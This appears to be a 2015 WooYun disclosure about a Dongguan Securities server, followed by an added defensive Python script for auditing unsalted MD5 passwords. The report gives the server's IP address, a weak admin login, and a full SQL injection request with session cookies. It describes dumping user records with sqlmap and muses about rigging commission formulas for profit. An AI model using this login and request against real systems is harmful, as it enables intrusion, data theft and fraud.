
Dongguan Securities: weak password on one site leads to SQL injection and leakage of user information (names, phone numbers, e-mail addresses, etc.)

2015-12-27 04:00

http://113.78.134.110:81/login.do, weak password admin:000000

Found some interesting functions, for example the ability to control commission rates.

If I were to directly change the commission formula and then collude with one or two people... (hugely profitable).

Proof of vulnerability:

Code area
POST /plug-in/FormulaEdit/xcfa/XCFA_operater.jsp?MODE=getRYJB HTTP/1.1
Host: 113.78.134.110:81
Content-Length: 7
Accept: */*
Origin: http://113.78.134.110:81
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://113.78.134.110:81/plug-in/common/transfer.jsp?ObjName=JspXCFA_ALL&Title=%E8%96%AA%E9%85%AC%E6%96%B9%E6%A1%88%E6%9F%A5%E7%9C%8B&Target=%2FUIProcessor%3FTable%3DJspXCFA_ALL%26ObjDescribe%3DekQgsYuZOYlCJlO7vghYvv41*q*BGee3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,es;q=0.6,fr;q=0.4,vi;q=0.2
Cookie: JSESSIONID=CD1D8642528FC7F86453EDE89D86BA6D.server1; UserID=admin; PortalToken=CD1D8642528FC7F86453EDE89D86BA6D.server1; ys-TreeState_5c1e7d68efba511c6e0ea9b8cafa4fb3.gt=o%3ARoot%3Ds%253AE%5EType.0%3Ds%253AE%5EType.1%3Ds%253AE; ys-TreeState_93782624d81163345d84577e158e26bd.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_799cde630a734708b3880f841ffa3f7d=o%3A1%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_e0b9adc1f800d29087017abd5def90cb.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_ed9b71d747488ab403c5cbf458822293.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_190cd205bb5a88c520b1fb91a3415f3a.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_7ef60d9127bb21b3203ca468ff919460.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_aa1c2e4bf18892844e938f68b2de3da1.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_293313064b95482991c003a03ac389b8.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE

RYFL=24

Fed the request straight to sqlmap; it turned out the database account even has DBA privileges.

Checked the user count: not large, only a little over 10,000.

But the table holds users' basic information such as names, phone numbers and e-mail addresses; I extracted some of the most recent records.


And found a large number of weak passwords...

Fix recommendation:

Source: www.wooyun.org/bugs/wooyun-2015-0163274
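As an added example that is not part of the original report: the leaked records stored passwords as unsalted MD5, which is why so many of them resolved to values like 111111 and 888888. The audit below shows how a defender can check such a table against a weak-password list (so affected accounts can be reset) and what to store instead; the user rows, logins and the weak-password list are constructed for illustration, and only Python standard-library hashing is used.

```python
import hashlib
import hmac
import os
from typing import Dict, List, Optional, Tuple

# Constructed sample rows shaped like the leaked table: (login, stored md5 hex).
# Logins are made up; the digests are md5() of the weak values noted beside them.
SAMPLE_USERS: List[Tuple[str, str]] = [
    ("u5078101", "96e79218965eb72c92a549dd5a330112"),  # md5("111111")
    ("u5048101", "21218cca77804d2ba1922c33e0151105"),  # md5("888888")
    ("u5010101", "b82ef710e72ee35fc33bd9a454668b01"),  # not in the weak list
    ("admin",    "670b14728ad9902aecba32e22fa4f6bd"),  # md5("000000")
]

# Short weak-password list (assumption: a real audit uses a much larger list).
WEAK_PASSWORDS = ["000000", "111111", "123456", "888888", "password", "admin"]

def weak_md5_table(words) -> Dict[str, str]:
    """Map md5(word) -> word so each stored digest costs one dict lookup."""
    return {hashlib.md5(w.encode()).hexdigest(): w for w in words}

def audit_unsalted_md5(users, words=WEAK_PASSWORDS) -> Dict[str, str]:
    """Return {login: weak_password} for every user whose unsalted MD5 matches."""
    # No salt means one precomputed table covers the whole user base, which is
    # exactly what let the report annotate each digest with its plaintext.
    table = weak_md5_table(words)
    return {login: table[h.lower()] for login, h in users if h.lower() in table}

def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = 200_000) -> str:
    """Replacement for unsalted MD5: per-user random salt + PBKDF2-HMAC-SHA256."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def verify_password(password: str, stored: str) -> bool:
    """Constant-time check of a password against a hash_password() record."""
    _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    for login, pw in audit_unsalted_md5(SAMPLE_USERS).items():
        print(f"{login}: weak password {pw!r}, force a reset")
```

Every login the audit returns should be forced through a password reset, and the re-hashed value stored with hash_password() so a future dump cannot be resolved with a precomputed table.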
